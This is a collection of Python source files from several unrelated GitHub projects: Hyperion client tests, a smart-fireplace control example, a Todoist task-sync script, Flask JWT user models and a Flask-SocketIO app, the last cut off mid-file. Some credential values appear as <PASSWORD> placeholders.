hc.async_get_serverinfo(timeout_secs=const.DEFAULT_TIMEOUT_SECS * 3)
)
# Wait 2 times the default (task should NOT have timed out)
await advance_time(const.DEFAULT_TIMEOUT_SECS * 2)
assert not task.done()
# Wait a further two times (should have timed out)
await advance_time(const.DEFAULT_TIMEOUT_SECS * 2)
assert not await task
assert task.done()
# == Verify request_token has a much larger default timeout.
auth_id = ("<PASSWORD>",)
comment = const.DEFAULT_ORIGIN
request_token_in = {
"command": "authorize",
"subcommand": "requestToken",
"comment": comment,
"id": auth_id,
}
await rw.add_flow([("write", {**request_token_in, **{"tan": 4}})])
# Create a task that requests a token (without overriding the default timeout).
task = asyncio.create_task(
hc.async_request_token(comment=const.DEFAULT_ORIGIN, id=auth_id)
)
# Wait 2 times the default timeout (task should NOT have timed out)
await advance_time(const.DEFAULT_TIMEOUT_SECS * 2)
assert not task.done()
await advance_time(const.DEFAULT_REQUEST_TOKEN_TIMEOUT_SECS)
assert not await task
assert task.done()
@pytest.mark.asyncio
async def test_send_and_receive(
event_loop: asyncio.AbstractEventLoop,
advance_time: EventLoopClockAdvancer,
hyperion_fixture: HyperionFixture,
) -> None:
"""Test a send and receive wrapper."""
(rw, hc) = hyperion_fixture.rw, hyperion_fixture.hc
clear_in = {"command": "clear", "priority": 50, "tan": 2}
clear_out = {"command": "clear", "success": True, "tan": 2}
# == Successful request & response.
await rw.add_flow([("write", clear_in), ("read", clear_out)])
assert await hc.async_clear(priority=50) == clear_out
# == Successful request & failed response.
clear_out["success"] = False
clear_out["tan"] = clear_in["tan"] = 3
await rw.add_flow([("write", clear_in), ("read", clear_out)])
assert await hc.async_clear(priority=50) == clear_out
# == Mismatch tan / timeout
# Test when the result doesn't include a matching tan (should time
# out). See related bug to include tan wherever possible:
#
# https://github.com/hyperion-project/hyperion.ng/issues/1001
clear_error = {
"command": "clear",
"error": "Errors during specific message validation, "
"please consult the Hyperion Log",
"success": False,
"tan": 0,
}
clear_in["tan"] = 4
await rw.add_flow([("write", clear_in), ("read", clear_error)])
task = asyncio.create_task(hc.async_clear(priority=50))
await rw.block_until_flow_empty()
await advance_time(const.DEFAULT_TIMEOUT_SECS * 2)
assert await task is None
# == Exception thrown in send.
await rw.add_flow([("write", ConnectionError())])
result = await hc.async_clear(**clear_in)
assert result is None
@pytest.mark.asyncio
async def test_using_custom_tan(
event_loop: asyncio.AbstractEventLoop, hyperion_fixture: HyperionFixture
) -> None:
"""Test a send and receive wrapper."""
(rw, hc) = hyperion_fixture.rw, hyperion_fixture.hc
clear_in = {"command": "clear", "priority": 50, "tan": 100}
clear_out = {"command": "clear", "success": True, "tan": 100}
# Test a successful call with a custom tan.
await rw.add_flow([("write", clear_in), ("read", clear_out)])
assert await hc.async_clear(priority=50, tan=100) == clear_out
# Test a call with a duplicate tan (will raise an exception).
await rw.add_flow([("write", clear_in), ("read", clear_out)])
with pytest.raises(client.HyperionClientTanNotAvailable):
await asyncio.gather(
hc.async_clear(priority=50, tan=100),
hc.async_clear(priority=50, tan=100),
)
await rw.assert_flow_finished()
# Test a custom tan and an automated tan, should succeed with the automated
# tan choosing the next number.
clear_in_1 = {"command": "clear", "priority": 50, "tan": 1}
clear_in_2 = {"command": "clear", "priority": 50, "tan": 2}
clear_out_1 = {"command": "clear", "success": True, "tan": 1}
clear_out_2 = {"command": "clear", "success": True, "tan": 2}
await rw.add_flow(
[
("write", clear_in_1),
("write", clear_in_2),
("read", clear_out_1),
("read", clear_out_2),
]
)
result_a, result_b = await asyncio.gather(
hc.async_clear(priority=50, tan=1),
hc.async_clear(priority=50),
)
assert clear_out_1 == result_a
assert clear_out_2 == result_b
async def test_async_send_calls_have_async_call(
event_loop: asyncio.AbstractEventLoop,
) -> None:
"""Verify async_send_* methods have an async_* pair."""
for name, value in inspect.getmembers(client.HyperionClient):
if name.startswith("async_send_") and callable(value):
new_name = "async_" + name[len("async_send_") :]
wrapper = getattr(client.HyperionClient, new_name, None)
assert wrapper is not None
# wrapper.func -> Returns a partial for AwaitResponseWrapper.__call__()
# .__self__ -> AwaitResponseWrapper
# ._coro -> The wrapped coroutine within AwaitResponseWrapper.
# pylint: disable=protected-access
assert wrapper.func.__self__._coro == value
@pytest.mark.asyncio
async def test_double_connect(
event_loop: asyncio.AbstractEventLoop, hyperion_fixture: HyperionFixture
) -> None:
"""Test the behavior of a double connect call."""
(rw, hc) = hyperion_fixture.rw, hyperion_fixture.hc
with patch("asyncio.open_connection", return_value=(rw, rw)):
assert await hc.async_client_connect()
assert hc.is_connected
@pytest.mark.asyncio
async def test_double_disconnect(
event_loop: asyncio.AbstractEventLoop, rw: MockStreamReaderWriter
) -> None:
"""Test the behavior of a double disconnect call."""
hc = await _create_client_and_connect(rw)
await _disconnect_and_assert_finished(rw, hc)
assert await hc.async_client_disconnect()
def test_generate_random_auth_id() -> None:
"""Test arandomly generated auth id."""
random_id = client.generate_random_auth_id()
assert len(random_id) == 5
for c in random_id:
assert c in (string.ascii_letters + string.digits)
@pytest.mark.asyncio
async def test_sysinfo(
event_loop: asyncio.AbstractEventLoop, hyperion_fixture: HyperionFixture
) -> None:
"""Test the sysinfo command."""
(rw, hc) = hyperion_fixture.rw, hyperion_fixture.hc
sysinfo_in = {"command": "sysinfo", "tan": 2}
sysinfo_out: dict[str, Any] = {
**TEST_SYSINFO_RESPONSE,
"tan": 2,
}
await rw.add_flow([("write", sysinfo_in), ("read", sysinfo_out)])
assert await hc.async_sysinfo() == sysinfo_out
@pytest.mark.asyncio
async def test_sysinfo_id(
event_loop: asyncio.AbstractEventLoop, hyperion_fixture: HyperionFixture
) -> None:
"""Verify fetching the sysinfo id."""
(rw, hc) = hyperion_fixture.rw, hyperion_fixture.hc
sysinfo_in = {"command": "sysinfo", "tan": 2}
sysinfo_out: dict[str, Any] = {
**TEST_SYSINFO_RESPONSE,
"tan": 2,
}
await rw.add_flow([("write", sysinfo_in), ("read", sysinfo_out)])
assert await hc.async_sysinfo_id() == TEST_SYSINFO_ID
@pytest.mark.asyncio
async def test_sysinfo_version(
event_loop: asyncio.AbstractEventLoop, hyperion_fixture: HyperionFixture
) -> None:
"""Verify fetching the sysinfo version."""
(rw, hc) = hyperion_fixture.rw, hyperion_fixture.hc
sysinfo_in = {"command": "sysinfo", "tan": 2}
sysinfo_out: dict[str, Any] = {
**TEST_SYSINFO_RESPONSE,
"tan": 2,
}
await rw.add_flow([("write", sysinfo_in), ("read", sysinfo_out)])
assert await hc.async_sysinfo_version() == TEST_SYSINFO_VERSION
@pytest.mark.asyncio
async def test_context_manager(
event_loop: asyncio.AbstractEventLoop, rw: MockStreamReaderWriter
) -> None:
"""Test the context manager functionality."""
with patch("asyncio.open_connection", return_value=(rw, rw)):
async with client.HyperionClient(TEST_HOST, TEST_PORT) as hc:
assert hc
assert hc.is_connected
await rw.assert_flow_finished()
await rw.add_flow([("close", None)])
await _block_until_done(rw)
await rw.assert_flow_finished()
assert not hc.is_connected
async def test_response_ok() -> None:
"""Test case for the Hyperion Client ResponseOK class."""
# Intentionally pass the wrong type.
assert not client.ResponseOK(["not", "a", "dict"]) # type: ignore[arg-type]
assert not client.ResponseOK({"data": 1})
assert not client.ResponseOK({const.KEY_SUCCESS: False})
assert client.ResponseOK({const.KEY_SUCCESS: True})
```
|
{
"source": "jeeftor/intellifire4py",
"score": 3
}
|
#### File: jeeftor/intellifire4py/example.py
```python
import asyncio
import os
import time
from intellifire4py import (
AsyncUDPFireplaceFinder,
IntellifireControlAsync,
IntellifireFireplace,
UDPFireplaceFinder,
)
from intellifire4py.control_async import IntellifireSendMode
from intellifire4py.exceptions import LoginException
async def main() -> None:
"""Run main function."""
print("----- Find Fire Places - Sync Mode (waiting 3 seconds)-----")
finder = UDPFireplaceFinder()
print(finder.search_fireplace(timeout=3))
print("----- Find Fire Places - Aync Mode (waiting 3 seconds)-----")
af = AsyncUDPFireplaceFinder()
await af.search_fireplace(timeout=3)
ip = af.ips[0]
print(f"-- Found fireplace at [{ip}] --")
"""Run main function."""
print(
"""
Accessing IFTAPI Username and Password via Environment Variables
- if these aren't set please do so, also
you will see some errors probably
export IFT_USER=<username>
export IFT_PASS=<password>
"""
)
username = os.environ["IFT_USER"]
password = <PASSWORD>["IFT_<PASSWORD>"]
print("--- Creating Fireplace Controller ---")
ift_control = IntellifireControlAsync(
fireplace_ip=ip, use_http=True, verify_ssl=False
)
try:
try:
print(" -- Purposefully trying a bad password!")
await ift_control.login(username=username, password="<PASSWORD>")
except LoginException:
print(" -- Now trying again correctly.")
try:
await ift_control.login(username=username, password=password)
except LoginException:
print(
"-- Could not login - make sure the login vars are correct ... bye --"
)
exit(1)
print("Logged in:", ift_control.is_logged_in)
# Get location list
locations = await ift_control.get_locations()
location_id = locations[0]["location_id"]
print(" -- Using location_id: ", location_id)
username = await ift_control.get_username()
print(" -- Accessing Username Cookie: ", username)
# Extract a fireplace
fireplaces = await ift_control.get_fireplaces(location_id=location_id)
fireplace: IntellifireFireplace = fireplaces[0]
default_fireplace = ift_control.default_fireplace
print("Closing Session")
await ift_control.close()
fireplaces = await ift_control.get_fireplaces(location_id=location_id)
username = await ift_control.get_username()
print("username", username)
print("Serial:", default_fireplace.serial)
print("APIKey:", default_fireplace.apikey)
# Send a soft reset command?
ift_control.send_mode = IntellifireSendMode.CLOUD
await ift_control.soft_reset(fireplace=default_fireplace)
await ift_control.flame_on(fireplace=fireplace)
# print('await ift_control.set_flame_height(fireplace=default_fireplace, height=4)')
# await ift_control.set_flame_height(fireplace=default_fireplace, height=4)
# time.sleep(10)
# ift_control.send_mode = IntellifireSendMode.CLOUD
# print('await ift_control.set_flame_height(fireplace=default_fireplace, height=0)')
# await ift_control.set_flame_height(fireplace=default_fireplace, height=0)
# sleep_time = 5
# await ift_control.flame_on(fireplace=fireplace)
# await ift_control.set_fan_speed(fireplace=fireplace, speed=0)
# time.sleep(sleep_time)
# await ift_control.set_fan_speed(fireplace=fireplace, speed=1)
# time.sleep(sleep_time)
# await ift_control.set_fan_speed(fireplace=fireplace, speed=2)
# time.sleep(sleep_time)
# await ift_control.set_fan_speed(fireplace=fireplace, speed=3)
# await ift_control.flame_off(fireplace=fireplace)
# exit(0)
for control in [IntellifireSendMode.LOCAL, IntellifireSendMode.CLOUD]:
print("Using çontrol Møde: ", control)
ift_control.send_mode = control
sleep_time = 5
await ift_control.flame_off(fireplace=default_fireplace)
time.sleep(sleep_time)
await ift_control.flame_on(fireplace=fireplace)
time.sleep(sleep_time)
await ift_control.set_flame_height(fireplace=default_fireplace, height=1)
time.sleep(sleep_time)
await ift_control.set_flame_height(fireplace=fireplace, height=2)
time.sleep(sleep_time)
await ift_control.set_flame_height(fireplace=fireplace, height=3)
time.sleep(sleep_time)
await ift_control.set_flame_height(fireplace=fireplace, height=4)
time.sleep(sleep_time)
# await ift_control.set_flame_height(fireplace=fireplace, height=5)
# time.sleep(sleep_time)
await ift_control.set_flame_height(fireplace=fireplace, height=1)
time.sleep(sleep_time)
await ift_control.set_fan_speed(fireplace=fireplace, speed=0)
time.sleep(sleep_time)
await ift_control.set_fan_speed(fireplace=fireplace, speed=2)
time.sleep(sleep_time)
await ift_control.set_fan_speed(fireplace=fireplace, speed=3)
time.sleep(sleep_time)
await ift_control.set_fan_speed(fireplace=fireplace, speed=4)
time.sleep(sleep_time)
await ift_control.set_fan_speed(fireplace=fireplace, speed=1)
time.sleep(sleep_time)
await ift_control.beep(fireplace=fireplace)
time.sleep(sleep_time)
await ift_control.flame_off(fireplace=fireplace)
finally:
await ift_control.close()
if __name__ == "__main__":
loop = asyncio.get_event_loop()
loop.run_until_complete(main())
```
#### File: intellifire4py/intellifire4py/exceptions.py
```python
class ApiCallException(Exception):
"""Error with the API call."""
class InputRangeException(Exception):
"""Input out of bounds."""
def __init__(self, field: str, min_value: int, max_value: int):
"""Initialize the exception."""
self.message = (
f"{field} is out of bounds: valid values [{min_value}:{max_value}]"
)
super().__init__(self.message)
class LoginException(Exception):
"""Failure with the login process."""
```
#### File: intellifire4py/intellifire4py/__init__.py
```python
from __future__ import annotations
from intellifire4py.const import IntellifireErrorCode
from intellifire4py.control_async import IntellifireControlAsync
from intellifire4py.intellifire_async import IntellifireAsync
from intellifire4py.model import (
IntellifireFireplace,
IntellifireFireplaces,
IntellifireLocationDetails,
IntellifireLocations,
IntellifirePollData,
)
from intellifire4py.udp import AsyncUDPFireplaceFinder, UDPFireplaceFinder
class ApiCallException(Exception):
"""Error with the API call."""
class InputRangeException(Exception):
"""Input out of bounds."""
def __init__(self, field: str, min_value: int, max_value: int):
"""Initialize the exception."""
self.message = (
f"{field} is out of bounds: valid values [{min_value}:{max_value}]"
)
super().__init__(self.message)
class LoginException(Exception):
"""Failure with the login process."""
```
#### File: intellifire4py/tests/test_const.py
```python
from unittest import TestCase
from intellifire4py.const import IntellifireErrorCode
class TestErrors(TestCase):
"""Test Case."""
def test_errors(self) -> None:
"""Test Function."""
e = IntellifireErrorCode(642)
assert e == IntellifireErrorCode.OFFLINE
```
|
{
"source": "jeeftor/pysunpower",
"score": 3
}
|
#### File: pysunpower/tests/test_model.py
```python
import pytest
from pysunpower.sunpowermodel import SunPowerModel, SupervisorModel, ProductionModel, ConsumptionModel, \
TypeGInverterModel
def test_type_g():
"""Test TypeG Data Parsing"""
f = open('type_g.json')
json_data = f.read()
data = SunPowerModel.parse_raw(json_data)
assert (data.devices[0].DEVICE_TYPE == "PVS")
assert (len(data.devices) == 21) # 3 control devices and 18 inverters
assert type(data.devices[0]) is SupervisorModel
assert type(data.devices[1]) is ProductionModel
assert type(data.devices[2]) is ConsumptionModel
assert type(data.devices[3]) is TypeGInverterModel
```
|
{
"source": "jeefy/nirvana",
"score": 2
}
|
#### File: jeefy/nirvana/main.py
```python
import github
import todoist
import requests
import datetime
import logging
import os
import json
import yaml
try:
from yaml import CLoader as Loader
except ImportError:
from yaml import Loader
from typing import Dict
# TargetProcess specific logic
def getTargetprocessTasks(cfg:Dict) -> Dict[str, Dict]:
tp_url = cfg['targetProcess']['url'] + '/api/v2/userstories?filter=?{}&take=100&select=%7Bid,storyName:name,bugs:Bugs.Where(EntityState.IsFinal!=true),tasks:Tasks.Where(EntityState.IsFinal!=true),project:%7Bproject.id,project.name%7D%7D&access_token={}'
logging.info("TargetProcess URL: {}".format(tp_url))
try:
r = requests.get(tp_url.format(cfg['targetProcess']['query'], cfg['targetProcess']['token']))
except Exception as e:
logging.fatal('Cannot connect to TargetProcess')
logging.fatal(e)
exit(1)
data = {}
for task in r.json()['items']:
task['name'] = task['storyName']
task['url'] = "https://umarcts.tpondemand.com/RestUI/Board.aspx#page=userstory/{}".format(task['id'])
data[formatTargetprocessTask(task)] = task
logging.info('Task found: {}'.format(task['name']))
for subtask in task['tasks']:
subtask['parent'] = formatTargetprocessTask(task)
subtask['project'] = task['project']
subtask['url'] = "https://umarcts.tpondemand.com/RestUI/Board.aspx#page=task/{}".format(subtask['id'])
data[formatTargetprocessTask(subtask)] = subtask
logging.info('Subtask found: {}'.format(subtask['name']))
for bug in task['bugs']:
bug['parent'] = formatTargetprocessTask(task)
bug['project'] = task['project']
bug['url'] = "https://umarcts.tpondemand.com/RestUI/Board.aspx#page=task/{}".format(bug['id'])
data[formatTargetprocessTask(bug)] = bug
logging.info('Bug found: {}'.format(bug['name']))
logging.debug(r.json()['items'])
return data
def syncWithTargetprocess(api: todoist.TodoistAPI, cfg: Dict):
tasks = getTargetprocessTasks(cfg)
logging.info("Syncing {} TargetProcess objects to Todoist".format(len(tasks)))
tpLabel = findOrCreateLabel(api, cfg['targetProcess']['defaultLabel'])
if 'defaultParentProject' in cfg['targetProcess']:
parentProject = findOrCreateProject(api, cfg['targetProcess']['defaultParentProject'])
labels = [tpLabel['id']]
if 'labels' in cfg['targetProcess']:
for v in cfg['targetProcess']['labels']:
label = findOrCreateLabel(api, v)
labels.append(label['id'])
item:todoist.models.Item
for item in api['items']:
if tpLabel['id'] in item['labels']:
logging.debug("Item {} has label {}".format(item['content'], tpLabel['id']))
found = False
for k in tasks.keys():
if k in item['content']:
logging.debug("Item {} matches {}".format(item['content'], k))
found = True
break
if not found:
logging.info("Marking {} as complete".format(item['content']))
item.complete()
for k,task in tasks.items():
tpProject = findOrCreateProject(api, task['project']['name'])
if 'defaultParentProject' in cfg['targetProcess']:
tpProject.move(parent_id=parentProject['id'])
item = findTaskWithContents(api, formatTargetprocessTask(task))
taskName = "[{}]({}) - {}".format(k, task['url'], task['name'])
if item is None:
if 'parent' in task:
parent = findTaskWithContents(api, task['parent'])
logging.info("Adding task: {} with parent {}".format(taskName, task['parent']))
api.items.add(taskName, project_id=tpProject['id'], parent_id=parent['id'], labels=labels)
else:
logging.info("Adding task: {}".format(taskName))
api.items.add(taskName, project_id=tpProject['id'], labels=labels)
else:
logging.info("Syncing task: {}".format(task['name']))
taskName = "[{}]({}) - {}".format(k, task['url'], task['name'])
api.items.update(item['id'], content=taskName)
def formatTargetprocessTask(task):
return "TP#{}".format(task['id'])
# Github specific logic
def getGithubTasks(cfg:Dict) -> Dict[str, type(github.Issue)]:
try:
g = github.Github(cfg['github']['token'])
except Exception as e:
logging.fatal('Could not authenticate to GitHub')
logging.fatal(e)
exit(1)
issues = g.search_issues(cfg['github']['query'])
data = {}
issue:github.Issue
for issue in issues:
data[formatGithubIssue(issue)] = issue
logging.debug(data)
return data
def formatGithubIssue(issue: github.Issue) -> str:
issueType = "issue"
if issue.pull_request is not None:
issueType = "pr"
return "{} {}#{}".format(issue.repository.full_name, issueType, issue.number)
def formatGithubProject(issue: github.Issue, cfg: Dict) -> str:
projectName = issue.repository.full_name
if 'defaultProject' in cfg['github']:
projectName = cfg['github']['defaultProject']
for k,v in cfg['github']['projectMap'].items():
if k in issue.repository.full_name:
projectName = v
return projectName
def syncWithGithub(api: todoist.TodoistAPI, cfg: Dict):
issues = getGithubTasks(cfg)
logging.info("Syncing {} GitHub objects to Todoist".format(len(issues)))
githubLabel = findOrCreateLabel(api, cfg['github']['defaultLabel'])
item:todoist.models.Item
for item in api['items']:
if githubLabel['id'] in item['labels']:
logging.debug("Item {} has label {}".format(item['content'], githubLabel['id']))
found = False
for k in issues.keys():
if k in item['content']:
logging.debug("Found task: {} in {}".format(k, item['content']))
found = True
break
if not found:
logging.info("Marking {} as complete".format(item['content']))
item.complete()
issue:github.Issue
for k,issue in issues.items():
logging.debug(issue.pull_request)
labels = [githubLabel['id']]
if 'labels' in cfg['github']:
for v in cfg['github']['labels']:
label = findOrCreateLabel(api, v)
labels.append(label['id'])
repoProject = findOrCreateProject(api, formatGithubProject(issue, cfg))
item = findTaskWithContents(api, formatGithubIssue(issue))
if 'labels' in cfg['github']:
for v in cfg['github']['labels']:
label = findOrCreateLabel(api, v)
labels.append(label['id'])
if 'labelMap' in cfg['github']:
for labelKey,labelList in cfg['github']['labelMap'].items():
logging.debug("Seeing if {} is in {}".format(labelKey, k))
if labelKey in k:
for a in labelList:
label = findOrCreateLabel(api, a)
labels.append(label['id'])
if item is None:
api.items.add("[{}]({}) - {}".format(k, "https://github.com/{}/issues/{}".format(issue.repository.full_name, issue.number), issue.title), project_id=repoProject['id'], labels=labels)
else:
api.items.update(item['id'], content="[{}]({}) - {}".format(k, "https://github.com/{}/issues/{}".format(issue.repository.full_name, issue.number), issue.title))
# Todoist Specific Logic
def findOrCreateLabel(api: todoist.TodoistAPI, query: str) -> todoist.models.Label:
logging.info("Find or create label: {}".format(query))
for label in api['labels']:
if label['name'] == query:
logging.info("Label found: {}".format(label['name']))
return label
label = api.labels.add(query)
logging.info("Creating label: {}".format(query))
logging.debug(label)
return label
def findOrCreateProject(api: todoist.TodoistAPI, query: str) -> todoist.models.Project:
logging.info("Find or create project: {}".format(query))
for project in api['projects']:
if project['name'] == query:
logging.info("Project found: {}".format(project['name']))
return project
project = api.projects.add(query)
logging.info('Creating project: {}'.format(query))
logging.debug(project)
return project
def findTaskWithContents(api: todoist.TodoistAPI, query: str) -> todoist.models.Item:
logging.info("Looking for task: {}".format(query))
for item in api['items']:
if query in item['content']:
logging.info("Task found: {}".format(item['content']))
return item
logging.info("Task NOT found: {}".format(query))
return None
# Config Loader
def loadConfig():
logging.info('Parsing config')
with open(os.environ.get('NIRVANA_CONFIG', default='config.yaml'), 'r') as ymlfile:
cfg = yaml.load(ymlfile, Loader=Loader)
tdTokenEnv = os.environ.get('TODOIST_TOKEN', None)
if tdTokenEnv is not None:
if 'todoist' not in cfg:
cfg['todoist'] = {}
cfg['todoist']['token'] = tdTokenEnv
tpTokenEnv = os.environ.get('TP_TOKEN', None)
if tpTokenEnv is not None:
if 'targetProcess' not in cfg:
cfg['targetProcess'] = {}
cfg['targetProcess']['token'] = tpTokenEnv
ghTokenEnv = os.environ.get('GH_TOKEN', None)
if ghTokenEnv is not None:
if 'github' not in cfg:
cfg['github'] = {}
cfg['github']['token'] = ghTokenEnv
return cfg
#########
def main():
logging.basicConfig(format='%(levelname)s:%(message)s', level=logging.DEBUG, filename='debug.log')
cfg = loadConfig()
logging.debug(cfg)
try:
api = todoist.TodoistAPI(cfg['todoist']['token'])
except Exception as e:
logging.fatal('Failed to connect to Todoist')
logging.fatal(e)
exit(1)
api.reset_state()
api.sync()
logging.info('Oh hi {}!'.format(api.state['user']['full_name']))
logging.debug(api['items'])
if 'github' in cfg:
syncWithGithub(api, cfg)
api.commit()
if 'targetProcess' in cfg:
syncWithTargetprocess(api, cfg)
api.commit()
logging.debug(api)
main()
```
|
{
"source": "jeehan24/the-vikings",
"score": 3
}
|
#### File: the-vikings/project/models.py
```python
import datetime
import jwt
from .import bcrypt, db, app
class BaseModel(db.Model):
"""Base data model for all objects"""
__abstract__ = True
def __init__(self, *args):
super().__init__(*args)
def __repr__(self):
"""Define a base way to print models"""
return '%s(%s)' % (self.__class__.__name__, {
column: value
for column, value in self._to_dict().items()
})
def json(self):
"""
Define a base way to jsonify models, dealing with datetime objects
"""
return {
column: value if not isinstance(value, datetime.date) else value.strftime('%Y-%m-%d')
for column, value in self._to_dict().items()
}
class User(BaseModel, db.Model):
""" User Model for storing user related details """
__tablename__ = "users"
__table_args__ = {'extend_existing': True}
id = db.Column(db.Integer, primary_key=True, autoincrement=True)
email = db.Column(db.String(255), unique=True, nullable=False)
username = db.Column(db.String(255), unique=True, nullable=False)
password = db.Column(db.String(255), nullable=False)
registered_on = db.Column(db.DateTime, nullable=False)
admin = db.Column(db.Boolean, nullable=False, default=False)
def __init__(self, email, username, password, admin=False):
self.email = email
self.username = username
self.password = <PASSWORD>.generate_password_hash(
password, app.config.get('BCRYPT_LOG_ROUNDS')
).decode()
self.registered_on = datetime.datetime.now()
self.admin = admin
def encode_auth_token(self, user_id):
"""
Generates the Auth Token
:return: string
"""
try:
payload = {
'exp': datetime.datetime.utcnow() + datetime.timedelta(days=365),
'iat': datetime.datetime.utcnow(),
'sub': user_id
}
return jwt.encode(
payload,
app.config.get('SECRET_KEY'),
algorithm='HS256'
)
except Exception as e:
return e
@staticmethod
def decode_auth_token(auth_token):
"""
Validates the auth token
:param auth_token:
:return: integer|string
"""
try:
payload = jwt.decode(auth_token, app.config.get('SECRET_KEY'))
is_blacklisted_token = BlacklistToken.check_blacklist(auth_token)
if is_blacklisted_token:
return 'Token blacklisted. Please log in again.'
else:
return payload['sub']
except jwt.ExpiredSignatureError:
return 'Signature expired. Please log in again.'
except jwt.InvalidTokenError:
return 'Invalid token. Please log in again.'
class BlacklistToken(BaseModel, db.Model):
"""
Token Model for storing JWT tokens
"""
__tablename__ = 'blacklist_tokens'
__table_args__ = {'extend_existing': True}
id = db.Column(db.Integer, primary_key=True, autoincrement=True)
token = db.Column(db.String(500), unique=True, nullable=False)
blacklisted_on = db.Column(db.DateTime, nullable=False)
def __init__(self, token):
self.token = token
self.blacklisted_on = datetime.datetime.now()
def __repr__(self):
return '<id: token: {}'.format(self.token)
@staticmethod
def check_blacklist(auth_token):
# check whether auth token has been blacklisted
res = BlacklistToken.query.filter_by(token=str(auth_token)).first()
if res:
return True
else:
return False
class Project(BaseModel, db.Model):
""" Project Model for storing project related details """
__tablename__ = "projects"
__table_args__ = {'extend_existing': True}
id = db.Column(db.Integer, primary_key=True, autoincrement=True)
owner = db.Column(db.String(), nullable=False)
xml = db.Column(db.String())
name = db.Column(db.String(256), nullable=False)
description = db.Column(db.String())
is_public = db.Column(db.Boolean, default=False)
last_modified = db.Column(db.DateTime, nullable=False)
num_stars = db.Column(db.Integer, default=False)
parent = db.Column(db.Integer)
def __init__(self,
owner,
name,
is_public,
description="",
xml="",
parent=None
):
self.owner = owner
self.description = description
self.xml = xml
self.is_public = is_public
self.name = name
self.last_modified = datetime.datetime.now()
self.num_stars = 0
self.parent = parent
class Stars(BaseModel, db.Model):
""" Stars model for storing starring details"""
__tablename__="stars"
#__table_args__= {'extend_existing': True}
s_id = db.Column(db.Integer, primary_key=True, autoincrement=True)
project_id = db.Column(db.Integer, nullable=False)
user_id = db.Column(db.Integer, nullable=False)
def __init__(self,
user_id,
project_id,
):
self.user_id=user_id
self.project_id = project_id
```
|
{
"source": "JeeheeHan/jenmu-bob-ross",
"score": 3
}
|
#### File: JeeheeHan/jenmu-bob-ross/crud.py
```python
from random import choice
from sqlalchemy import func
from model import Painting, db, connect_to_db
import csv
import pandas
import ast
###### Random picks for front page ######
def get_random_quote():
"""Open text file and get a random quote"""
with open ("./data/quotes.txt", "r") as quotes:
all_quotes = quotes.read().rstrip("\n").split("\n\n")
quote = choice(all_quotes)
return quote
def get_random_painting():
"""SCALAR the random img_src """
item = db.session.query(Painting).order_by(func.random()).first()
return item
####### GET the colors ######
def break_down_hex_colors(item):
hexes = ast.literal_eval(item.color_hex)
return hexes
if __name__ == '__main__':
from server import app
connect_to_db(app)
```
|
{
"source": "JeeheeHan/PUL-app",
"score": 3
}
|
#### File: JeeheeHan/PUL-app/forms.py
```python
from model import User
from crud import login_check
#Reference to:https://flask-wtf.readthedocs.io/en/stable/quickstart.html#creating-forms
from flask_wtf import FlaskForm
from wtforms import StringField, PasswordField, SubmitField, SelectField, TextAreaField
from wtforms.validators import DataRequired, InputRequired, Length, EqualTo, ValidationError
class LoginForm(FlaskForm):
"""Login form with validation from wtforms"""
username = StringField(u'username', validators=[InputRequired(message="Enter your Username")], render_kw={"placeholder": "Your Username", "class":"login"})
password = PasswordField(u'password', validators=[InputRequired(message="Enter your password")],render_kw={"placeholder": "Your Password","type":"password","class":"login"})
submit = SubmitField("Login")
class RegisterForm(FlaskForm):
"""Register form with the required elements!"""
username = StringField(u'username', validators=[InputRequired(message="Enter your Username"), Length(min=4, max=25, message="Username must be between 4 and 25 characters")], render_kw={"placeholder": "Username","class":"login"})
password = PasswordField(u'password', validators=[InputRequired(message="Enter your Password"), Length(min=4, max=25, message="Password must be between 4 and 25 characters")],render_kw={"placeholder": "Password","type":"password","class":"login"})
confirm_pswd = PasswordField(u'confirm_pwd', validators=[InputRequired(message="Password required"), EqualTo('password', message="Passsword needs to match")], render_kw={"placeholder": "Confirm Password","type":"password","class":"login"})
submit = SubmitField("Register")
def validate_username(self, username):
#WTF forms will automatically invoke these
"""Check if username is taken"""
user_ = User.query.filter_by(username=username.data).first()
if user_ is not None:
raise ValidationError("Username taken, please choose another one")
class UserprofileForm(FlaskForm):
"""Edit form to change username or password"""
username = StringField(u'username', validators=[DataRequired()], render_kw={"type":"hidden"})
password = PasswordField(u'password', validators=[DataRequired()],render_kw={"placeholder": "Current Password","type":"password","class":"login"} )
new_password = PasswordField(u'new password', validators=[InputRequired(message="Enter a new desired Password"), Length(min=4, max=25, message="Password must be between 4 and 25 characters")], render_kw={"placeholder": "New Password","type":"password","class":"login"})
confirm_new_pswd = PasswordField(u'confirm_new_pwd', validators=[InputRequired(message="Confirm new password"), EqualTo('new_password', message="Passsword needs to match")],render_kw={"placeholder": "Confirm New Password","type":"password","class":"login"})
submit = SubmitField("Update")
class WordsForm(FlaskForm):
"""Form to get polarity of requested text"""
analysis = SelectField(u'Opinion Mining', choices=[('pat', 'Dictionary based (Pattern Library)'), ('naive', 'Movie Ratings based(NaiveBayers)')], render_kw={"class":"wordform"})
text = TextAreaField(u'Text', validators=[Length(max=200)],render_kw={"placeholder":"Polarity ranges from most positve being 1 while at worst -1 for negativity", "class":"wordform"})
submit = SubmitField("Run")
```
#### File: JeeheeHan/PUL-app/server.py
```python
from flask import Flask, render_template, request, redirect, jsonify, request, flash, jsonify
from jinja2 import StrictUndefined
from flask_socketio import SocketIO, emit
from flask_login import LoginManager,current_user,login_user,logout_user, login_required
from flask_session import Session
import os
from datetime import timedelta
import json
from model import *
from forms import *
import crud
app = Flask(__name__)
app.secret_key = os.environ['SECRET_KEY']
app.config['SESSION_TYPE'] = 'filesystem'
app.config['SESSION_PERMANENT'] = True
#default session time is 31 days for flask so setting it to 30 mins
app.config['PERMANENT_SESSION_LIFETIME'] = timedelta(minutes=30)
app.jinja_env.undefined = StrictUndefined
#Declaring loginmanager into a var and using it as a decorator to check if user is logged in
login_manager = LoginManager(app)
login_manager.login_message = ""
#Since socket io will branch off after copying the sessions, we need to turn off manage session for flask session works
Session(app)
#create the server with the var socketio
socketio = SocketIO(app, manage_session=False)
@login_manager.user_loader
def load_user(user_id):
return User.query.get(int(user_id))
@app.route('/')
def homepage():
"""When the user connects, the database will send over latest inputs to load the html along with the pic appropriate to the plant's health
The sentiment analyzer form is also returned in the homepage"""
count_dict = crud.count_pos_neg()
messages = crud.get_messages()
pic = crud.get_plant_health(crud.get_ratio(count_dict))
form = WordsForm()
return render_template("index.html", messages = messages, count = count_dict, pic = pic, form = form)
##### REAL TIME asynchronous routes ######
@socketio.on('connect')
def connected():
"""Print conncted if any one connects to the website"""
print('Connected!')
@socketio.on('disconnect')
